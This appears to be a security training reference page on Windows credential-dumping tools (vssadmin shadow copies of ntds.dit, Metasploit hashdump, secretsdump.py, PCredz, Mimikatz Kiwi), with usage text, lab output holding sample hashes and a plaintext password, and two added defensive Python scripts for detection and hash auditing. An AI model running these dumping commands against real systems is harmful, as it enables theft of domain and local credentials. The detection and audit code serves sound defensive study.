vssadmin

⚠ Only present on Domain Controllers

Description

The administrative command-line tool for the Windows Volume Shadow Copy Service. It can be used to make copies of files that are currently in use (including ntds.dit).

Platform: Windows
Author: Microsoft
License: Windows
URL: vssadmin

Usage

vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
 
---- Commands Supported ----
 
Delete Shadows        - Delete volume shadow copies
List Providers        - List registered volume shadow copy providers
List Shadows          - List existing volume shadow copies
List ShadowStorage    - List volume shadow copy storage associations
List Volumes          - List volumes eligible for shadow copies
List Writers          - List subscribed volume shadow copy writers
Resize ShadowStorage  - Resize a volume shadow copy storage association

Examples

vssadmin list shadows

This will list any existing shadow copies.

C:\WINDOWS\system32>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
 
Contents of shadow copy set ID: {34e68305-975f-4d17-8655-4993d495a4e7}
   Contained 1 shadow copies at creation time: 3/17/2022 5:14:25 PM
      Shadow Copy ID: {670f6106-3968-4656-a8cc-a822f2222719}
         Original Volume: (C:)\\?\Volume{f99d1339-fef8-4d0c-92f0-df3a6876270d}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: DESKTOP-TI18DM9
         Service Machine: DESKTOP-TI18DM9
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessibleWriters
         Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered

You can then copy files out of the shadow volume, for example ntds.dit.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\windows\temp\ntds.dit

Then you also need to save the SYSTEM hive, since it holds the encryption key needed to decrypt ntds.dit.

reg save hklm\system C:\windows\temp\system /y

vssadmin create shadow /for=c:

This will create a new shadow copy of the C: drive. Alternatively, you can make the equivalent WMI call from PowerShell.

(gwmi -list win32_shadowcopy).Create('C:\','ClientAccessible')
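The commands in this entry are also exactly what a defender should be watching for in process-creation telemetry. The following is an added example, not part of this page or of any Microsoft tooling: a small Python rule set run over a constructed export of process command lines (the export format, one bare command line per line as a SIEM might pull from the CommandLine field of Security Event ID 4688 or Sysmon Event ID 1, and the sample lines themselves are assumptions). It flags each vssadmin and WMI shadow-copy command shown above and correlates the three-step sequence of creating a shadow, reading ntds.dit from it and saving the SYSTEM hive.

```python
import re

# Constructed sample: one process command line per line, as a SIEM might export
# the CommandLine field of Windows Security Event ID 4688 or Sysmon Event ID 1.
# (Assumption: the export has already been reduced to bare command lines.)
SAMPLE_LOG = r"""
C:\Windows\system32\svchost.exe -k netsvcs
vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\windows\temp\ntds.dit
reg save hklm\system C:\windows\temp\system /y
powershell.exe -c "(gwmi -list win32_shadowcopy).Create('C:\','ClientAccessible')"
vssadmin list shadows
vssadmin delete shadows /all /quiet
notepad.exe C:\Users\alice\notes.txt
"""

# Detection rules: (name, case-insensitive regex over the command line).
# Each one corresponds to a command shown in the vssadmin entry above.
RULES = [
    ("vss_create", re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate\s+shadow\b", re.I)),
    ("vss_list", re.compile(r"\bvssadmin(\.exe)?\b.*\blist\s+shadows\b", re.I)),
    ("vss_delete", re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b", re.I)),
    ("wmi_shadowcopy_create", re.compile(r"win32_shadowcopy.*\.create\(", re.I)),
    ("ntds_from_shadow", re.compile(r"harddiskvolumeshadowcopy\d+\\.*\\ntds\.dit", re.I)),
    ("system_hive_save", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I)),
]


def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(log_text):
    """Run all rules over a log export and correlate the ntds.dit dump sequence.

    Returns {"findings": [(line_no, rule_name), ...], "ntds_dump_sequence": bool}.
    The sequence flag is set when a shadow copy was created (via vssadmin or WMI),
    ntds.dit was read from a shadow volume, and the SYSTEM hive was saved: the
    three steps the entry above describes, which together mean the domain
    database and the key needed to decrypt it have both been collected.
    """
    findings = []
    seen = set()
    for line_no, line in enumerate(log_text.strip().splitlines(), 1):
        for name in classify(line):
            findings.append((line_no, name))
            seen.add(name)
    created = "vss_create" in seen or "wmi_shadowcopy_create" in seen
    sequence = created and "ntds_from_shadow" in seen and "system_hive_save" in seen
    return {"findings": findings, "ntds_dump_sequence": sequence}


if __name__ == "__main__":
    result = scan(SAMPLE_LOG)
    for line_no, name in result["findings"]:
        print(f"line {line_no}: {name}")
    print("ntds.dit dump sequence observed:", result["ntds_dump_sequence"])
```

On their own, `vssadmin list shadows` or a single shadow creation are routine backup activity, so the individual hits are best kept at low severity; the correlated sequence is what separates the ntds.dit extraction described above from an administrator's normal work. Shadow deletion deserves its own alert regardless, since it removes the copies a recovery would rely on.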

Blog Posts

smart_hashdump

⚠ Use on Domain Controllers only. Use the regular hashdump for non-DCs.

Description

This will dump local accounts from the SAM Database. If the target host is a Domain Controller, it will dump the Domain Account Database using the proper technique depending on privilege level, OS and role of the host.

Platform: Windows
Author: Carlos Perez
License: BSD 3-Clause
URL: smart_hashdump.rb

Usage

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  GETSYSTEM  false            no        Attempt to get SYSTEM privilege on the target host.
  SESSION                     yes       The session to run this module on

Examples

run post/windows/gather/smart_hashdump

This is all there is to it.

Blog Posts

secretsdump.py

Description

Performs various techniques to dump hashes from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) we try to read as much as we can from the registry and then we save the hives in the target system (%SYSTEMROOT%\Temp dir) and read the rest of the data from there.

Platform: Python
Author: Alberto Solino
License: Modified Apache License 1.1
URL: secretsdump.py

Usage

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
 
usage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]
                      [-security SECURITY] [-sam SAM] [-ntds NTDS]
                      [-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]
                      [-use-vss] [-exec-method [{smbexec,wmiexec,mmcexec}]]
                      [-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]
                      [-pwd-last-set] [-user-status] [-history]
                      [-hashes LMHASH:NTHASH] [-no-pass] [-k]
                      [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]
                      [-target-ip ip address]
                      target
 
Performs various techniques to dump secrets from the remote machine without
executing any agent there.
 
positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
                        or LOCAL (if you want to parse local files)
 
optional arguments:
  -h, --help            show this help message and exit
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON
  -system SYSTEM        SYSTEM hive to parse
  -bootkey BOOTKEY      bootkey for SYSTEM hive
  -security SECURITY    SECURITY hive to parse
  -sam SAM              SAM hive to parse
  -ntds NTDS            NTDS.DIT file to parse
  -resumefile RESUMEFILE
                        resume file name to resume NTDS.DIT session dump (only
                        available to DRSUAPI approach). This file will also be
                        used to keep updating the session's state
  -outputfile OUTPUTFILE
                        base output filename. Extensions will be added for
                        sam, secrets, cached and ntds
  -use-vss              Use the VSS method insead of default DRSUAPI
  -exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using
                        -use-vss). Default: smbexec
 
display options:
  -just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified.
                        Only available for DRSUAPI approach. Implies also
                        -just-dc switch
  -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos
                        keys)
  -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)
  -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account.
                        Doesn't apply to -outputfile data
  -user-status          Display whether or not the user is disabled
  -history              Dump password history, and LSA secrets OldVal
 
authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters.
                        If valid credentials cannot be found, it will use the
                        ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256
                        bits)
  -keytab KEYTAB        Read keys for SPN from keytab file
 
connection:
  -dc-ip ip address     IP Address of the domain controller. If ommited it use
                        the domain part (FQDN) specified in the target
                        parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will
                        use whatever was specified as target. This is useful
                        when target is the NetBIOS name and you cannot resolve
                        it

Examples

secretsdump.py -ntds ./ntds.dit -system ./system -outputfile /tmp/hashes.txt LOCAL

This will dump the hashes from a saved copy of ntds.dit using the encryption key in a saved copy of the SYSTEM hive.

Blog Posts

PCredz

Description

This tool extracts credit card numbers, NTLM (DCE-RPC, HTTP, SQL, LDAP, etc.), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP and other credentials from a pcap file or from a live interface.

Platform: Linux
Author: Laurent Gaffie
License: GPLv3
URL: https://github.com/lgandx/PCredz

Usage

usage: Pcredz [-h] [-f FNAME | -d DIR_PATH | -i INTERFACE] [-c] [-t] [-v]
 
Pcredz 1.0.0 Author: Laurent Gaffie
 
optional arguments:
  -h, --help    show this help message and exit
  -f FNAME      Pcap file to parse
  -d DIR_PATH   Pcap directory to parse recursivly
  -i INTERFACE  interface for live capture
  -c            deactivate CC number scanning (Can gives false positives!)
  -t            Include a timestamp in all generated messages (useful for
                correlation)
  -v            More verbose.

Examples

sudo Pcredz -vf /tmp/winauth.pcap

This will attempt to extract creds or other interesting information from the provided pcap file. We can then use john or hashcat to crack the extracted NTLMv2 hash.

user@slingshot:~$ sudo Pcredz -vf /tmp/winauth.pcap
Starting PCredz...
Pcredz 2.0.2
Author: Laurent Gaffie
Please send bugs/comments/pcaps to: laurent.gaffie@gmail.com
This script will extract NTLM (HTTP,LDAP,SMB,MSSQL,RPC, etc), Kerberos,
FTP, HTTP Basic and credit card data from a given pcap file or from a live interface.
 
CC number scanning activated
 
Using TCPDump format
 
protocol: tcp 192.168.78.129:58134 > 192.168.78.128:445
NTLMv2 complete hash is: clark::WORKGROUP:44a05f29e1c2534d:B86D2E3E3D8678A2DEB1E3D02AB2F510:010100000000000013DCEC4AA939D80164541AA67023DFDC0000000002001A00530045004300350036003000530054005500440045004E00540001001A00530045004300350036003000530054005500440045004E00540004001A00530065006300350036003000530074007500640065006E00740003001A00530065006300350036003000530074007500640065006E0074000700080013DCEC4AA939D8010600040002000000080030003000000000000000000000000000000090A0E4593F39BEEA0158A182FBAAF7F73CB2CFB5FF586EF3994BC0061253F54A0A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00370038002E0031003200380000000000
 
 
/tmp/winauth.pcap parsed in: 0.0382 seconds (File size 0.00506 Mo).

Additional Details

  • Stores output in /opt/pcredz/CredentialDump-Session.log
  • Also creates /opt/pcredz/logs directory with files named after the hash types found.

Blog Posts

Mimikatz Kiwi

Description

Mimikatz is a well-known tool for extracting plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. Mimikatz can also perform pass-the-hash and pass-the-ticket, or build Golden Tickets. Kiwi is the Metasploit implementation.

Platform: Windows
Author: gentilkiwi (Benjamin DELPY)
License: Creative Commons 4.0
URL: https://blog.gentilkiwi.com/mimikatz

Usage

Kiwi Commands
=============
 
    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_livessp          Retrieve Live SSP creds
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    password_change        Change the password/hash of a user
    wifi_list              List wifi profiles/creds for the current user
    wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

Examples

load kiwi

This command will load the Mimikatz module in a Meterpreter session.

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
 
Success.

creds_all

This will attempt to dump all the Windows credentials from RAM.

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
 
Username  Domain         NTLM                              SHA1
--------  ------         ----                              ----
sec       SECSTUDENT     396f460962c665bc648db299d55f1ba2  4029ce95b7a89f3c63148d94e789c0350e069ef4
 
wdigest credentials
===================
 
Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
SECSTUDENT$     SEC            (null)
sec             SECSTUDENT     (null)
 
kerberos credentials
====================
 
Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
sec             SEC            sec123
secstudent$     SEC            (null)

Blog Posts

hashdump

Description

This module will dump the local user accounts from the SAM database using the registry.

Platform: Windows
Author: Metasploit
License: BSD 3-Clause
URL: hashdump.rb

Usage

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on

Examples

run post/windows/gather/hashdump

Here are the results of running this command from a meterpreter session.

meterpreter > run post/windows/gather/hashdump
 
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 2609c40b5e36c810763cbc8bf8962276...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
 
No users with password hints on this system
 
[*] Dumping password hashes...
 
 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e0d68f3bf01ad13902472922c3921dad:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
SROCAdmin:1008:aad3b435b51404eeaad3b435b51404ee:2e920723943f81ec0af0fd735f737fef:::
antivirus:1009:aad3b435b51404eeaad3b435b51404ee:47f0ca5913c6e70090d7b686afb9e13e:::
slopez:1010:aad3b435b51404eeaad3b435b51404ee:87e968ead530264915a4b295c57c37d5:::
aparker:1011:aad3b435b51404eeaad3b435b51404ee:9b5684b030226a1203e4e7b718a3f9df:::
rgray:1012:aad3b435b51404eeaad3b435b51404ee:23d26a03aa7102abce4805d88e568a78:::
wrobinson:1013:aad3b435b51404eeaad3b435b51404ee:5deaec4b57b859c25cdd0513fb7bc750:::
mlara:1014:aad3b435b51404eeaad3b435b51404ee:d8d9eee954da5f2d42fe72f862fa493f:::
lstout:1015:aad3b435b51404eeaad3b435b51404ee:ca3f0e9ce3188b0602742da2976d6773:::
tandersen:1016:aad3b435b51404eeaad3b435b51404ee:bf459116e5854e34031997be8e13596d:::
awalker:1017:aad3b435b51404eeaad3b435b51404ee:fe1f27a2561b61511588b0d24e333a7c:::
mmiller:1018:aad3b435b51404eeaad3b435b51404ee:7a1f1fd59eb2b97041c74748ea6a68f8:::
vcollins:1019:aad3b435b51404eeaad3b435b51404ee:5bd9b7b6fce76d3aabfebee9debaa932:::
jrivera:1020:aad3b435b51404eeaad3b435b51404ee:baa90a3ad89d359009ce5425063dff3e:::
hhopkins:1021:aad3b435b51404eeaad3b435b51404ee:92929561b2758f409df2b4a24a59c6f4:::
kcooper:1022:aad3b435b51404eeaad3b435b51404ee:5ae44bf0a1e24c0b1ec96708f30e7b84:::
ksutton:1023:aad3b435b51404eeaad3b435b51404ee:a6051a02b7a2bfb4cd0e2c1a9cb4a694:::
rduarte:1024:aad3b435b51404eeaad3b435b51404ee:7ce56170c73f9582fa348db88de2c192:::
dwilliams:1025:aad3b435b51404eeaad3b435b51404ee:c6fd7d8bb36d8862c1b978896a6bec51:::
nramos:1026:aad3b435b51404eeaad3b435b51404ee:0f46bafd2c4acdac0003a1ff4da92625:::
abates:1027:aad3b435b51404eeaad3b435b51404ee:62a56ba1b94193d7f553b895bca28292:::
khansen:1028:aad3b435b51404eeaad3b435b51404ee:fc9fdcdbf09c5be4928287e4ad847dd7:::
vberry:1029:97abc432e5e8e8a03b9ce0ab2b8f2634:d99438ebb5f67b113dab1f907e26979b:::
cgentry:1030:aad3b435b51404eeaad3b435b51404ee:059db5a4061f5a2cb5053e753f9664b4:::
sbates:1031:aad3b435b51404eeaad3b435b51404ee:4f8bfa5d78d7a6398915c9657cd49769:::
dbryant:1032:aad3b435b51404eeaad3b435b51404ee:858bf9272facf23b3593f609e5b64c06:::
srichardson:1033:aad3b435b51404eeaad3b435b51404ee:819dc07ca50e1729d72214e8e9ee8f3a:::
kkennedy:1034:aad3b435b51404eeaad3b435b51404ee:7c3acf216ef4ec061b9330e0ad103c35:::
scook:1035:aad3b435b51404eeaad3b435b51404ee:2d474458480f9aa524ba3ebb1f3f9e6e:::
pmartin:1036:aad3b435b51404eeaad3b435b51404ee:98f9db311936bea281e9a65f45dd1f62:::
egeorge:1037:aad3b435b51404eeaad3b435b51404ee:f482c3342543f49df31a5a240a0558cf:::
phorne:1038:aad3b435b51404eeaad3b435b51404ee:b9a04517b70e549f8b2e4153ee8f4107:::
ckhan:1039:aad3b435b51404eeaad3b435b51404ee:aff059fe35c553548f56db9c85b2d90c:::
dmckenzie:1040:aad3b435b51404eeaad3b435b51404ee:50a173c77e22c87c419cacb5e0629b52:::
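The pwdump-style lines above, and the `.ntds` file that `secretsdump.py -outputfile` writes (same `user:rid:lmhash:nthash:::` layout, with an optional `DOMAIN\` prefix on the user), are what an administrator reviews when auditing password hygiene on their own systems. The following is an added example, not code from this page, from Metasploit or from Impacket: a Python parser for that format plus an audit pass that flags accounts still storing a real LM hash, accounts whose NT hash is that of an empty password, and NT-hash reuse across accounts. The sample dump is constructed from a few of the lines above plus a made-up `svc_backup` account; the `EXAMPLE` domain prefix is an assumption.

```python
import re
from collections import OrderedDict

# One pwdump-format line: user:rid:lmhash:nthash::: (hashdump output) or
# DOMAIN\user:rid:lmhash:nthash::: (secretsdump's .ntds output). Anything else,
# such as banners or [*] progress lines, is ignored by the parser.
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::", re.I
)

# Well-known constants: the LM and NT hashes of an empty password. An LM field
# equal to EMPTY_LM means no LM hash is stored for that account at all.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample dump: lines taken from the hashdump output above plus a
# made-up svc_backup account (assumption) that reuses slopez's NT hash.
SAMPLE_DUMP = r"""
[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e0d68f3bf01ad13902472922c3921dad:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vberry:1029:97abc432e5e8e8a03b9ce0ab2b8f2634:d99438ebb5f67b113dab1f907e26979b:::
slopez:1010:aad3b435b51404eeaad3b435b51404ee:87e968ead530264915a4b295c57c37d5:::
EXAMPLE\svc_backup:1041:aad3b435b51404eeaad3b435b51404ee:87e968ead530264915a4b295c57c37d5:::
"""


def parse_pwdump(text):
    """Parse every pwdump-format line into a dict; skip everything else."""
    records = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if not m:
            continue
        user = m["user"].split("\\")[-1]  # drop a DOMAIN\ prefix if present
        records.append({
            "user": user,
            "rid": int(m["rid"]),
            "lm": m["lm"].lower(),
            "nt": m["nt"].lower(),
        })
    return records


def audit(records):
    """Report the three hygiene problems a dump like this one exposes.

    lm_stored: accounts that still have a real LM hash (password predates the
               NoLMHash policy, or the policy is not enforced).
    blank_nt:  accounts whose password is empty.
    nt_reuse:  groups of accounts sharing the same non-empty NT hash, i.e. the
               same password, so compromising one compromises all of them.
    """
    lm_stored = [r["user"] for r in records if r["lm"] != EMPTY_LM]
    blank_nt = [r["user"] for r in records if r["nt"] == EMPTY_NT]
    by_nt = OrderedDict()  # preserves first-seen order for stable reporting
    for r in records:
        if r["nt"] != EMPTY_NT:
            by_nt.setdefault(r["nt"], []).append(r["user"])
    nt_reuse = [users for users in by_nt.values() if len(users) > 1]
    return {"lm_stored": lm_stored, "blank_nt": blank_nt, "nt_reuse": nt_reuse}


if __name__ == "__main__":
    report = audit(parse_pwdump(SAMPLE_DUMP))
    for key, value in report.items():
        print(f"{key}: {value}")
```

The reuse check deliberately excludes the empty-password hash, which is already reported under `blank_nt`; built-in accounts such as Guest and DefaultAccount normally show it because they are disabled with no password set, so the finding that matters is a blank NT hash on an enabled account, which this report does not know on its own. The `-user-status` flag of secretsdump.py shown above supplies that information.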

Blog Posts